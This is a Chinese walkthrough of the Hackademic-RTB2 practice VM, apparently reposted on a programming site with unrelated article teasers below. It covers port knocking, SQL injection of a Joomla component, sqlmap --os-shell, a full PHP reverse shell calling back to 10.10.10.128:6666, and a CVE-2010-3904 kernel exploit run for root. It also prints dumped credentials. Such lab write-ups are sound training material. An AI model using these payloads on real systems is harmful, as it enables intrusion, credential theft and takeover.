Hackadmin-RTB-2 WP记录

news2026/3/27 19:55:49
信息搜集永远的第一步不知道666是个什么东西可以访问一下无法访问dirsearch扫下目录依次访问一下看看有没有交互点开始找漏洞扫一下有没有注入点没扫出来并且扫phpmyadmin也没有扫出来虽然目前的两个页面可交互的地方都没有办法通过sql注入进行脱库但是用nmap扫出来的端口也没有别的服务所以还是得从两个可交互页面入手。尝试万能密码登入成功但是仍然没有交互点我们查看下源码发现了奇怪的东西复制问下aiURL 编码数据解码分析一、数据解码这是URL 编码Percent-encoding的数据让我解码第一部分解码text%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61解码后text ---------- \r \n即 ---------- 后跟回车换行第二部分重复的十六进制数据text%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39这些是 ASCII 十六进制值解码后textK n o c k K n o c k K n o c k i n o n h e a v e n s d o o r . . :)我们可以让ai给生成一个解码的脚本#!/usr/bin/env python3 # -*- coding: utf-8 -*- URL编码/十六进制/二进制多层解码脚本 用于解码渗透测试中发现的隐藏信息 import re import binascii import sys def hex_to_ascii(hex_str): 十六进制字符串转ASCII try: # 移除空格和换行 clean_hex re.sub(r[\s\n], , hex_str) hex_bytes bytes.fromhex(clean_hex) return hex_bytes.decode(utf-8, errorsignore) except Exception as e: return f[十六进制解码失败: {e}] def binary_to_ascii(binary_str): 二进制字符串转ASCII try: # 移除空格只保留0和1 clean_binary re.sub(r[^01], , binary_str) result for i in range(0, len(clean_binary), 8): if i 8 len(clean_binary): byte clean_binary[i:i 8] result chr(int(byte, 2)) return result except Exception as e: return f[二进制解码失败: {e}] def url_decode(data): URL解码 try: import urllib.parse return urllib.parse.unquote(data) except: return data def base64_decode(data): Base64解码 try: import base64 return base64.b64decode(data).decode(utf-8, errorsignore) except: return None def decode_hex_sequence(text): 提取并解码文本中的十六进制序列 hex_pattern re.findall(r[0-9A-Fa-f]{2}(?:\s[0-9A-Fa-f]{2})*, text) results [] for hex_seq in hex_pattern: if len(hex_seq.replace( , )) 2: decoded hex_to_ascii(hex_seq) if decoded and not all(c in 0123456789abcdefABCDEF \n\r\t for c in decoded): results.append((hex_seq[:50], decoded[:200])) return results def decode_binary_sequence(text): 提取并解码文本中的二进制序列 binary_pattern re.findall(r[01]{8}(?:\s[01]{8})*, text) results [] for binary_seq in binary_pattern: if len(binary_seq.replace( , )) 8: decoded binary_to_ascii(binary_seq) if decoded and not all(c in 01 \n\r\t for c in decoded): results.append((binary_seq[:50], decoded[:200])) return results def main(): 主函数 # 你的原始数据 original_data %33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A print( * 70) print( 多层编码解码工具) print( * 70) # 第1层URL解码 print(\n[第1层] URL解码...) layer1 url_decode(original_data) print(f结果: {layer1[:200]}...) print() # 第2层十六进制转ASCII print([第2层] 十六进制转ASCII...) layer2 hex_to_ascii(layer1) print(f结果:\n{layer2}) print() # 第3层提取二进制数据 print([第3层] 提取二进制数据...) binary_pattern re.findall(r[01]{8}(?:\s[01]{8})*, layer2) if binary_pattern: print(f找到 {len(binary_pattern)} 组二进制数据) all_binary .join(binary_pattern) print(f二进制数据: {all_binary[:100]}...) # 转换为ASCII layer3 binary_to_ascii(all_binary) print(f\n二进制解码结果: {layer3}) # 第4层如果是十六进制继续解码 if layer3 and all(c in 0123456789abcdefABCDEF \n\r\t for c in layer3[:100]): print(\n[第4层] 检测到十六进制继续解码...) layer4 hex_to_ascii(layer3) print(f结果: {layer4}) # 第5层可能又是二进制 binary_in_hex re.findall(r[01]{8}, layer4) if binary_in_hex: print(\n[第5层] 检测到二进制继续解码...) layer5 binary_to_ascii( .join(binary_in_hex)) print(f结果: {layer5}) # 第6层可能是Base64 if layer5 and len(layer5) 10: b64_result base64_decode(layer5) if b64_result: print(\n[第6层] Base64解码:) print(f结果: {b64_result}) # 额外提取所有十六进制序列 print(\n * 70) print(额外提取的十六进制序列:) print( * 70) hex_results decode_hex_sequence(layer2) for hex_seq, decoded in hex_results: print(f\n十六进制: {hex_seq}...) print(f解码: {decoded}) print(\n * 70) print(解码完成) print( * 70) if __name__ __main__: main()解码之后得到了这么一组数据结合之前的knockknock可以推断一下这里用的是端口敲门端口敲门Port Knocking详解端口敲门是一种网络安全技术通过向服务器的一系列特定端口发送预定义的连接尝试序列来“敲门”触发防火墙规则动态开放访问权限。可以理解为一种秘密敲门暗号——只有知道正确“敲门顺序”的人才能打开服务端口。 工作原理核心概念敲门序列预定义的端口连接顺序如 1000→2000→3000防火墙规则初始状态关闭所有服务端口如 SSH触发机制防火墙监控连接日志检测到正确序列后动态开放端口工作流程text1. 客户端按顺序连接指定端口1000 → 2000 → 3000 2. 服务器防火墙检测到序列匹配 3. 防火墙添加临时规则开放 SSH 端口如 22 4. 客户端在短时间内建立 SSH 连接 5. 连接结束后端口自动关闭 端口敲门 vs 单包授权特性端口敲门 (Port Knocking)单包授权 (SPA)原理多个端口连接序列单个加密数据包安全性序列可被嗅探加密防重放隐蔽性端口连接可被看到UDP 包不可见实现复杂度简单较复杂典型工具knockdfwknop 实际配置示例1.使用 knockd 实现端口敲门服务端配置/etc/knockd.confini[options] logfile /var/log/knockd.log [openSSH] sequence 7000,8000,9000 # 敲门序列 seq_timeout 5 # 5秒内完成序列 command /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags syn [closeSSH] sequence 9000,8000,7000 # 关闭序列反向 seq_timeout 5 command /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags syn客户端敲门bash# 发送敲门序列 knock -v target-server.com 7000 8000 9000 # 然后正常 SSH 连接 ssh usertarget-server.com2.使用 iptables 脚本实现自定义敲门脚本bash#!/bin/bash # 发送敲门信号 for port in 1000 2000 3000; do nc -z -w 1 $1 $port sleep 0.5 done 安全优势优势说明减少攻击面服务端口默认关闭端口扫描无法发现防止暴力破解攻击者不知道敲门序列无法访问服务动态访问控制按需开放使用后自动关闭防御 0day 漏洞即使服务有漏洞未授权也无法访问隐蔽性无开放端口降低被发现的概率⚠️ 局限性问题说明序列可嗅探敲门序列在网络中明文传输可被抓包截获重放攻击攻击者可重放捕获的序列绕过防护DoS 风险序列冲突或误触发可能导致服务不可用性能开销每次连接前需要额外敲门步骤单点依赖防火墙规则生效依赖服务正常运行那么接下来我们要尝试使用端口敲门去打开666端口再次用nmap扫描可以看见此时的666端口已经打开再次访问666端口怀疑这里有sql注入点好吧并没有我们只能找找有没有其他的交互点点击list可以看见url有非常明显的变化怀疑有sql注入好的这回是真有脱数据脱库当前数据库是joomla脱joomla中的表脱数据joomla-jos_usersIDGID用户名邮箱用户类型注册时间最后登录6225Administratoradminhackademirtb2.comSuper Administrator2011-01-17 19:31:212011-01-22 16:38:496318JSmithJSmithhackademicrtb.comRegistered2011-01-22 10:17:302011-01-25 15:02:136418BTallorBTallorhackademic.comRegistered2011-01-22 10:18:060000-00-00 00:00:00JSmith -matrixBTallor -victim脱mysql中的表爆数据mysql-userHostUser密码哈希权限用途localhostroot*5D3C124406BF85494067182754131FF4DAB9C6C7全部权限(Y)MySQL root 账户HackademicRTB2root*5D3C124406BF85494067182754131FF4DAB9C6C7全部权限(Y)主机名绑定的 root127.0.0.1root*5D3C124406BF85494067182754131FF4DAB9C6C7全部权限(Y)本地 rootlocalhostdebian-sys-maint*F36E6519B0B1D62AA2D5346EFAD66D1CAF248996全部权限(Y)Debian 系统维护用户localhostphpmyadmin*5D3C124406BF85494067182754131FF4DAB9C6C7无权限(N)phpMyAdmin 专用用户但是很遗憾这些密码没办法解开getshell用sqlmap拿到shell​ sqlmap -u http://10.10.10.134:666/index.php?optioncom_abcviewabcletterListofcontentitems...Itemid3 --batch --os-shell ​查看文件得到密码用户: root密码: yUtJklM97W数据库: joomla主机: localhost但是os-shell很不稳定好难用的一个功能所以我们尝试更换为反弹shell反弹shell?php set_time_limit (0); $VERSION 1.0; $ip 10.10.10.128; // CHANGE THIS $port 6666; // CHANGE THIS $chunk_size 1400; $write_a null; $error_a null; $shell uname -a; w; id; /bin/sh -i; $daemon 0; $debug 0; if (function_exists(pcntl_fork)) { $pid pcntl_fork(); if ($pid -1) { printit(ERROR: Cant fork); exit(1); } if ($pid) { exit(0); // Parent exits } if (posix_setsid() -1) { printit(Error: Cant setsid()); exit(1); } $daemon 1; } else { printit(WARNING: Failed to daemonise. This is quite common and not fatal.); } chdir(/); umask(0); $sock fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit($errstr ($errno)); exit(1); } $descriptorspec array( 0 array(pipe, r), 1 array(pipe, w), 2 array(pipe, w) ); $process proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit(ERROR: Cant spawn shell); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit(Successfully opened reverse shell to $ip:$port); while (1) { if (feof($sock)) { printit(ERROR: Shell connection terminated); break; } if (feof($pipes[1])) { printit(ERROR: Shell process terminated); break; } $read_a array($sock, $pipes[1], $pipes[2]); $num_changed_sockets stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit(SOCK READ); $input fread($sock, $chunk_size); if ($debug) printit(SOCK: $input); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit(STDOUT READ); $input fread($pipes[1], $chunk_size); if ($debug) printit(STDOUT: $input); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit(STDERR READ); $input fread($pipes[2], $chunk_size); if ($debug) printit(STDERR: $input); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print $string\n; } } ?首先再开一个命令页称呼它为kali当前有os-shell的称呼为靶机先在kali上开启http服务python3 -m http.server 8000再在靶机上去下载shell.php因为os-shell不稳定所以命令没有成功大家要多试试查看靶机上有没有shell.phpcat shell.php上传成功后在kali上开始监听nc -lvnp 6666再去访问shell.php给shell升级一下python -c import pty; pty.spawn(/bin/bash)内核提权先查看一下当前靶机内核版本这里可以用脏牛但是这次我打算用历史漏洞来突破bash./linux-exploit-suggester-2.pl -k 2.6.32 | grep 15285这个命令的作用linux-exploit-suggester-2.pl是一个自动检测提权漏洞的工具-k 2.6.32指定内核版本| grep 15285过滤出 exploit 15285Source: http://www.exploit-db.com/exploits/1528515285.c是CVE-2010-3904的 exploit漏洞名称Linux Kernel 2.6.x (RDS协议) 本地提权影响版本内核 2.6.30 - 2.6.36你的内核 2.6.32 正好在受影响范围内在这里打开http服务切换至之前由反弹shell监听的界面首先切换至可写目录cd /tmp再去下载15285.c这个文件​ wget http://10.10.10.128:8000/15285.c查看文件是否下载成功ls -la 15285.c编译这个文件gcc 15285.c -o exploit运行这个文件./exploit此时可以看见提权成功漏洞补充用之前得到的root-yUtJklM97W可以成功登入用JSmith -matrix可以成功登入新人小白如果写的不好还请见谅

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2442283.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringBoot-17-MyBatis动态SQL标签之常用标签

文章目录 1 代码1.1 实体User.java1.2 接口UserMapper.java1.3 映射UserMapper.xml1.3.1 标签if1.3.2 标签if和where1.3.3 标签choose和when和otherwise1.4 UserController.java2 常用动态SQL标签2.1 标签set2.1.1 UserMapper.java2.1.2 UserMapper.xml2.1.3 UserController.ja…

wordpress后台更新后 前端没变化的解决方法

使用siteground主机的wordpress网站,会出现更新了网站内容和修改了php模板文件、js文件、css文件、图片文件后,网站没有变化的情况。 不熟悉siteground主机的新手,遇到这个问题,就很抓狂,明明是哪都没操作错误&#x…

网络编程(Modbus进阶)

思维导图 Modbus RTU(先学一点理论) 概念 Modbus RTU 是工业自动化领域 最广泛应用的串行通信协议,由 Modicon 公司(现施耐德电气)于 1979 年推出。它以 高效率、强健性、易实现的特点成为工业控制系统的通信标准。 包…

UE5 学习系列(二)用户操作界面及介绍

这篇博客是 UE5 学习系列博客的第二篇,在第一篇的基础上展开这篇内容。博客参考的 B 站视频资料和第一篇的链接如下: 【Note】:如果你已经完成安装等操作,可以只执行第一篇博客中 2. 新建一个空白游戏项目 章节操作,重…

IDEA运行Tomcat出现乱码问题解决汇总

最近正值期末周,有很多同学在写期末Java web作业时,运行tomcat出现乱码问题,经过多次解决与研究,我做了如下整理: 原因: IDEA本身编码与tomcat的编码与Windows编码不同导致,Windows 系统控制台…

利用最小二乘法找圆心和半径

#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

一、环境及版本说明 如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章 传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章 传送阵>> 点我查看 说明&#xff1a;假设每台服务器已…

XML Group端口详解

在XML数据映射过程中&#xff0c;经常需要对数据进行分组聚合操作。例如&#xff0c;当处理包含多个物料明细的XML文件时&#xff0c;可能需要将相同物料号的明细归为一组&#xff0c;或对相同物料号的数量进行求和计算。传统实现方式通常需要编写脚本代码&#xff0c;增加了开…

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器的上位机配置操作说明

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器专为工业环境精心打造&#xff0c;完美适配AGV和无人叉车。同时&#xff0c;集成以太网与语音合成技术&#xff0c;为各类高级系统&#xff08;如MES、调度系统、库位管理、立库等&#xff09;提供高效便捷的语音交互体验。 L…

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目&#xff1a;3442. 奇偶频次间的最大差值 I 思路 &#xff1a;哈希&#xff0c;时间复杂度0(n)。 用哈希表来记录每个字符串中字符的分布情况&#xff0c;哈希表这里用数组即可实现。 C版本&#xff1a; class Solution { public:int maxDifference(string s) {int a[26]…

【大模型RAG】拍照搜题技术架构速览:三层管道、两级检索、兜底大模型

摘要 拍照搜题系统采用“三层管道&#xff08;多模态 OCR → 语义检索 → 答案渲染&#xff09;、两级检索&#xff08;倒排 BM25 向量 HNSW&#xff09;并以大语言模型兜底”的整体框架&#xff1a; 多模态 OCR 层 将题目图片经过超分、去噪、倾斜校正后&#xff0c;分别用…

【Axure高保真原型】引导弹窗

今天和大家中分享引导弹窗的原型模板&#xff0c;载入页面后&#xff0c;会显示引导弹窗&#xff0c;适用于引导用户使用页面&#xff0c;点击完成后&#xff0c;会显示下一个引导弹窗&#xff0c;直至最后一个引导弹窗完成后进入首页。具体效果可以点击下方视频观看或打开下方…

接口测试中缓存处理策略

在接口测试中&#xff0c;缓存处理策略是一个关键环节&#xff0c;直接影响测试结果的准确性和可靠性。合理的缓存处理策略能够确保测试环境的一致性&#xff0c;避免因缓存数据导致的测试偏差。以下是接口测试中常见的缓存处理策略及其详细说明&#xff1a; 一、缓存处理的核…

龙虎榜——20250610

上证指数放量收阴线&#xff0c;个股多数下跌&#xff0c;盘中受消息影响大幅波动。 深证指数放量收阴线形成顶分型&#xff0c;指数短线有调整的需求&#xff0c;大概需要一两天。 2025年6月10日龙虎榜行业方向分析 1. 金融科技 代表标的&#xff1a;御银股份、雄帝科技 驱动…

观成科技:隐蔽隧道工具Ligolo-ng加密流量分析

1.工具介绍 Ligolo-ng是一款由go编写的高效隧道工具&#xff0c;该工具基于TUN接口实现其功能&#xff0c;利用反向TCP/TLS连接建立一条隐蔽的通信信道&#xff0c;支持使用Let’s Encrypt自动生成证书。Ligolo-ng的通信隐蔽性体现在其支持多种连接方式&#xff0c;适应复杂网…

铭豹扩展坞 USB转网口 突然无法识别解决方法

当 USB 转网口扩展坞在一台笔记本上无法识别,但在其他电脑上正常工作时,问题通常出在笔记本自身或其与扩展坞的兼容性上。以下是系统化的定位思路和排查步骤,帮助你快速找到故障原因: 背景: 一个M-pard(铭豹)扩展坞的网卡突然无法识别了,扩展出来的三个USB接口正常。…

未来机器人的大脑:如何用神经网络模拟器实现更智能的决策?

编辑&#xff1a;陈萍萍的公主一点人工一点智能 未来机器人的大脑&#xff1a;如何用神经网络模拟器实现更智能的决策&#xff1f;RWM通过双自回归机制有效解决了复合误差、部分可观测性和随机动力学等关键挑战&#xff0c;在不依赖领域特定归纳偏见的条件下实现了卓越的预测准…

Linux应用开发之网络套接字编程(实例篇)

服务端与客户端单连接 服务端代码 #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <pthread.h> …

华为云AI开发平台ModelArts

华为云ModelArts&#xff1a;重塑AI开发流程的“智能引擎”与“创新加速器”&#xff01; 在人工智能浪潮席卷全球的2025年&#xff0c;企业拥抱AI的意愿空前高涨&#xff0c;但技术门槛高、流程复杂、资源投入巨大的现实&#xff0c;却让许多创新构想止步于实验室。数据科学家…

深度学习在微纳光子学中的应用

深度学习在微纳光子学中的主要应用方向 深度学习与微纳光子学的结合主要集中在以下几个方向&#xff1a; 逆向设计 通过神经网络快速预测微纳结构的光学响应&#xff0c;替代传统耗时的数值模拟方法。例如设计超表面、光子晶体等结构。 特征提取与优化 从复杂的光学数据中自…